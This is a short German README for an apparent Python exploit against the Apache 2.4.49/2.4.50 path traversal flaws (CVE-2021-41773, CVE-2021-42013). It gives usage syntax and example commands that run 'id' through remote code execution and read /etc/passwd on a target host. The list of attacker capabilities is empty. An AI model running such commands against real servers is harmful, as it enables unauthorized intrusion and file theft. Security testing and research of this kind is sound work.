
Python-Exploit für Apache HTTP Server Path Traversal (CVE-2021-41773 & CVE-2021-42013), der LFI und RCE über CGI ermöglicht. Für autorisierte Sicherheitstests und Forschung.
CVE-2021-41773 & CVE-2021-42013
Hierbei handelt es sich um kritische Path-Traversal-Schwachstellen, die Apache HTTP Server 2.4.49 und 2.4.50 betreffen.
Sie ermöglichen Angreifern:
Beide Schwachstellen sind in Apache 2.4.51 gepatcht.
Ein sofortiges Upgrade wird dringend empfohlen.
python3 exploit.py --url <TARGET> --port [PORT] (--rce --command "COMMAND" | --lfi --path "/path/to/file")
Beispiele
python3 exploit.py --url http://192.168.1.10 --rce --command "id"

python3 exploit.py --url http://192.168.1.10 --lfi --path "/etc/passwd"

Dieses Exploit-Skript dient ausschließlich autorisierten Sicherheitstests, defensiver Forschung und Bildungszwecken.